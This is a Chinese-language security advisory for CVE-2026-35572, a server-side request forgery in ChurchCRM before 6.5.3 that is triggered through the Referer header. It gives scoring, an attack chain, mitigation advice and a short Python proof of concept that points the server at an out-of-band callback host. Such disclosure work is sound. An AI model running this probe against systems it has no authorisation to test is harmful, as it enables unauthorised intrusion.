CVE-2026-35572 CVSS 6.0 中危

CVE-2026-35572 ChurchCRM存在SSRF漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35572

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.0 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM 是一个开源的教堂管理系统。在 6.5.3 版本之前，该系统存在服务端请求伪造（SSRF）漏洞。攻击者可以通过在 Referer 请求头中注入精心构造的恶意 URL，诱导服务器向攻击者控制的域名发起出站请求，该过程可通过 OAST 进行确认。该漏洞已在 6.5.3 版本中修复。

技术细节

该漏洞源于 ChurchCRM 在处理传入请求时未对 Referer 请求头进行充分的验证和过滤。由于应用程序直接使用了 Referer 头中的值来发起外部的 HTTP/HTTPS 请求，攻击者可以构造包含恶意域名（如 burpcollaborator.net）的 Referer 头。当服务器处理该请求时，会解析 Referer 头并向攻击者控制的服务器发送请求。由于 CVSS 评分显示需要高权限（PR:H），这意味着攻击者通常需要登录账户才能触发该漏洞。虽然攻击复杂度低且无需用户交互，但利用此漏洞可能导致敏感信息泄露（机密性影响高），并在一定程度上影响系统的完整性和可用性。

攻击链分析

STEP 1

攻击者认证

攻击者获取 ChurchCRM 系统的高权限账户凭据，成功登录系统。

STEP 2

构造恶意载荷

攻击者准备一个 HTTP 请求，将其 Referer 请求头字段设置为攻击者控制的 OAST 服务器地址。

STEP 3

发送请求

攻击者向 ChurchCRM 应用程序发送包含恶意 Referer 头的 HTTP 请求。

STEP 4

触发SSRF

ChurchCRM 服务器解析请求头中的 Referer 字段，并向攻击者指定的外部服务器发起 HTTP 连接。

STEP 5

确认漏洞

攻击者在 OAST 服务器上接收到来自目标服务器的请求，确认 SSRF 漏洞利用成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable ChurchCRM instance
target_url = "http://localhost:8080/"

# Attacker controlled domain for OAST interaction (e.g., Burp Collaborator)
attacker_domain = "http://oast.me"

# The vulnerability is triggered via the Referer header
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Referer": attacker_domain
}

try:
    # Send request with malicious Referer header
    # Note: Authentication might be required based on CVSS PR:H
    print(f"[*] Sending request to {target_url} with Referer: {attacker_domain}")
    response = requests.get(target_url, headers=headers)
    print(f"[*] Response Status Code: {response.status_code}")
    print("[*] Check your OAST server for DNS/HTTP interactions.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

建议立即升级到修复版本。如果无法立即升级，应在网络层面限制服务器的出站连接，仅允许访问必要的白名单域名，并部署 WAF 拦截包含异常 Referer 头的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表